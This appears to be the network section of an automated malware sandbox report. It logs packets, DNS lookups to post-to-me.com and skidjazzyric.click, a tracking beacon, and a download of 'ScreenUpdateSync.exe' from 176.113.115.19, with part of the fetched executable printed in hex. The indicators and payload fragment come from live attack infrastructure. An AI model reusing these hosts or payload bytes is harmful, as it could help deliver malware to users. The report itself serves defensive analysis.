                                                                                                      Jan 9, 2025 08:34:13.711014032 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711025000 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711040974 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711067915 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711252928 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711276054 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711292028 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711298943 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711317062 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711323023 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711328983 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711338043 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711342096 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711354017 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711354017 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711366892 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711380005 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711383104 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711390972 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711405039 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711411953 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711430073 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711455107 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.711582899 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.711621046 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.758753061 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758768082 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758780003 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758872986 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758884907 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758898973 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758898020 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.758913040 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758929968 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758949995 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.758969069 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758971930 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.758981943 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.758994102 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.759006023 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.759006977 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.759018898 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.759047985 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.759082079 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:14.865330935 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:14.865366936 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:14.865436077 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:14.866488934 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:14.866501093 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.334892035 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.334965944 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.338047028 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.338056087 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.338294029 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.385490894 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.398593903 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.398638964 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.398703098 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.694416046 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.694506884 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.694567919 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.747529030 CET49732443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.747554064 CET44349732104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.987512112 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.987569094 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:15.987633944 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.988296986 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:15.988307953 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.442931890 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.443011999 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.444462061 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.444489956 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.444721937 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.446014881 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.446039915 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.446084023 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927187920 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927236080 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927270889 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927274942 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.927294016 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927325964 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.927334070 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927362919 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927392006 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.927401066 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927740097 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927784920 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.927793026 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927897930 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.927930117 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.927937031 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:16.979218006 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:16.979233980 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.013969898 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014002085 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014019966 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014031887 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014058113 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014086008 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014101028 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014148951 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014157057 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014168978 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014197111 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014601946 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014620066 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.014630079 CET49733443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.014635086 CET44349733104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.193753004 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.193793058 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.193862915 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.194186926 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.194199085 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.646724939 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.646912098 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.648411036 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.648423910 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.648652077 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.650019884 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.650167942 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.650190115 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:17.650253057 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:17.650262117 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.278506041 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.278593063 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.280772924 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:18.280919075 CET49734443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:18.280927896 CET44349734104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.469260931 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.469954014 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:18.671080112 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:18.671138048 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:18.671365976 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:18.671704054 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:18.671721935 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.151443005 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.151525021 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.152798891 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.152817965 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.153052092 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.154288054 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.154441118 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.154465914 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.671139002 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.671246052 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.671439886 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.671564102 CET49735443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.671581030 CET44349735104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.920217991 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.920262098 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:19.920350075 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.920653105 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:19.920664072 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.374953032 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.375081062 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.376522064 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.376537085 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.376801014 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.378180981 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.378407955 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.378432989 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.378499985 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.378509998 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.998877048 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.998981953 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:20.999129057 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.999254942 CET49736443192.168.2.4104.21.48.1
                                                                                                      Jan 9, 2025 08:34:20.999274015 CET44349736104.21.48.1192.168.2.4
                                                                                                      Jan 9, 2025 08:36:00.235667944 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:36:03.404239893 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:36:09.713917971 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:36:22.346462011 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:36:47.589009047 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:37:38.073513031 CET4973180192.168.2.4176.113.115.19
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 9, 2025 08:34:10.306209087 CET5799053192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 08:34:10.320043087 CET53579901.1.1.1192.168.2.4
                                                                                                      Jan 9, 2025 08:34:14.848287106 CET5105453192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET53510541.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Jan 9, 2025 08:34:10.306209087 CET192.168.2.41.1.1.10x1184Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.848287106 CET192.168.2.41.1.1.10xab1bStandard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Jan 9, 2025 08:34:10.320043087 CET1.1.1.1192.168.2.40x1184No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:10.320043087 CET1.1.1.1192.168.2.40x1184No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 08:34:14.860445023 CET1.1.1.1192.168.2.40xab1bNo error (0)skidjazzyric.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                      • post-to-me.com
                                                                                                      • skidjazzyric.click
                                                                                                      • 176.113.115.19
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449731176.113.115.19806712C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Jan 9, 2025 08:34:12.533467054 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                      User-Agent: ShareScreen
                                                                                                      Host: 176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.220058918 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:13 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Last-Modified: Thu, 09 Jan 2025 07:30:02 GMT
                                                                                                      ETag: "53600-62b40f23d5dfc"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 341504
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Zkkkk;kkdk9QkjmkkkkRichkPELe$P^@@?*(hG@t.textV#$ `.data@`(@.rsrch@@
                                                                                                      Jan 9, 2025 08:34:13.220074892 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 2c 04 00 aa 2c 04 00 c2 2c 04 00 d6 2c 04 00 ee 2c 04 00 02 2d 04 00 18 2d 04 00 2e 2d 04 00 42 2d 04 00 52 2d 04 00 62 2d
                                                                                                      Data Ascii: ,,,,,--.-B-R-b-r-------....>.P.`.p......../2/F/N/\/n/z///////0060H0`0x0
                                                                                                      Jan 9, 2025 08:34:13.220082045 CET448INData Raw: 00 00 00 02 2b 6e 40 00 ca 6d 40 00 ca 6d 40 00 00 00 00 00 00 00 00 00 00 00 f0 3f 7f 02 35 c2 68 21 a2 da 0f c9 3e 40 ff ff ff ff ff ff ef 7f 00 00 00 00 00 00 10 00 00 00 00 00 00 00 98 c0 00 00 00 00 00 00 98 40 00 00 00 00 00 00 f0 7f 00 00
                                                                                                      Data Ascii: +n@m@m@?5h!>@@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocruntime error TLOSS errorSING error
                                                                                                      Jan 9, 2025 08:34:13.220138073 CET1236INData Raw: 20 63 6f 64 65 20 66 72 6f 6d 20 74 68 69 73 20 61 73 73 65 6d 62 6c 79 20 64 75 72 69 6e 67 20 6e 61 74 69 76 65 20 63 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e
                                                                                                      Data Ascii: code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough spa
                                                                                                      Jan 9, 2025 08:34:13.220149994 CET1236INData Raw: 04 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00
                                                                                                      Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=
                                                                                                      Jan 9, 2025 08:34:13.220266104 CET448INData Raw: 00 00 f2 3f 00 00 00 b4 91 72 eb 3f f6 8c ed 38 7b 4b 1c 3e 00 00 00 00 00 80 f2 3f 00 00 00 ec 70 de eb 3f 39 95 ba 6c fe 39 24 3e 00 00 00 00 00 00 f3 3f 00 00 00 bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac
                                                                                                      Data Ascii: ?r?8{K>?p?9l9$>?G?aji9>?T|?'\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ |?x7|1>?|?9>
                                                                                                      Jan 9, 2025 08:34:13.220278978 CET1236INData Raw: 1d 51 46 3e 00 00 00 00 00 80 fb 3f 00 00 00 2c 8f d3 f0 3f dd 23 2f a4 27 e8 16 3e 00 00 00 00 00 00 fc 3f 00 00 00 d8 a5 f2 f0 3f 5d 58 cd 63 02 ff 3f 3e 00 00 00 00 00 80 fc 3f 00 00 00 00 eb 10 f1 3f 08 d0 d4 ae 7d ce 1f 3e 00 00 00 00 00 00
                                                                                                      Data Ascii: QF>?,?#/'>??]Xc?>??}>?e.?IdWA>?K??>?Xg?4*A>?_?[J>??10H>??hc#]G>@,*?QxF
                                                                                                      Jan 9, 2025 08:34:13.220293999 CET224INData Raw: 00 00 00 04 b0 7b f4 3f 34 e6 8b d6 32 47 3c 3e 00 00 00 00 00 c0 0a 40 00 00 00 4c 1b 86 f4 3f c3 82 a9 fe e1 7c 2f 3e 00 00 00 00 00 00 0b 40 00 00 00 8c 59 90 f4 3f df fb c0 73 f1 0a 40 3e 00 00 00 00 00 40 0b 40 00 00 00 e0 6b 9a f4 3f d9 f0
                                                                                                      Data Ascii: {?42G<>@L?|/>@Y?s@>@@k?a@>@XS?x(3u8>@?vO,ib>@?&LC>@@?}L>@X?Lo>@x?
                                                                                                      Jan 9, 2025 08:34:13.220304012 CET1236INData Raw: 2d d4 1b cf a0 99 39 3e 00 00 00 00 00 00 0d 40 00 00 00 a0 73 dc f4 3f 36 46 49 44 1b 3f 39 3e 00 00 00 00 00 40 0d 40 00 00 00 38 4a e5 f4 3f 8c 99 ab be 67 73 4c 3e 00 00 00 00 00 80 0d 40 00 00 00 64 fd ed f4 3f 11 15 98 a0 79 10 15 3e 00 00
                                                                                                      Data Ascii: -9>@s?6FID?9>@@8J?gsL>@d?y>@?>&09C>@?<A>@@(J?IVC>@`w?^@N>@?#%@>@s?MK>@@D'?
                                                                                                      Jan 9, 2025 08:34:13.220316887 CET1236INData Raw: 00 e0 14 40 00 00 00 c4 06 1f f6 3f af 82 b7 46 5c 49 45 3e 00 00 00 00 00 00 15 40 00 00 00 74 7b 23 f6 3f ff a5 d7 af 04 2c 42 3e 00 00 00 00 00 20 15 40 00 00 00 30 e3 27 f6 3f 89 45 95 20 5d 81 24 3e 00 00 00 00 00 40 15 40 00 00 00 2c 3e 2c
                                                                                                      Data Ascii: @?F\IE>@t{#?,B> @0'?E ]$>@@,>,??5>`@0?iIqE>@4?ha;>@9?AD>@.=?KFw=@DMA?=@`E?apI0H>
                                                                                                      Jan 9, 2025 08:34:13.225172997 CET1236INData Raw: f7 29 8f 35 47 c8 35 3e 00 00 00 00 00 60 1b 40 00 00 00 58 59 d2 f6 3f 8a 7c da 1a ca 7a 4a 3e 00 00 00 00 00 80 1b 40 00 00 00 40 fd d4 f6 3f 57 b5 de be 9b 4c 3f 3e 00 00 00 00 00 a0 1b 40 00 00 00 30 9b d7 f6 3f 8d da f9 e9 9d 36 3a 3e 00 00
                                                                                                      Data Ascii: )5G5>`@XY?|zJ>@@?WL?>@0?6:>@<3?QB>@x?7o/M>@Q?KcZ0> @?z-A5>@@Z?"BDcI>`@?`I.>@ L?L


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449730104.21.56.704436712C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:11 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                      User-Agent: ShareScreen
                                                                                                      Host: post-to-me.com
                                                                                                      2025-01-09 07:34:11 UTC802INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:11 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      X-Powered-By: PHP/5.4.16
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8DMki86G8RwZunRs7Y3E1kZ9mM%2FmM16upVvjVm7YbBUr4VU4ufVtYc6cyayx%2Ba1SYHjxTn4rMTVUilex%2BAMKYqYRrASWkvbjAANOjG4wxwWltA1TtwfZrWfdXoAqlfP9%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be4fff2a43d9-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1571&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1810291&cwnd=221&unsent_bytes=0&cid=f8e69bf61b0a8860&ts=382&x=0"
                                                                                                      2025-01-09 07:34:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2025-01-09 07:34:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449732104.21.48.14437076C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
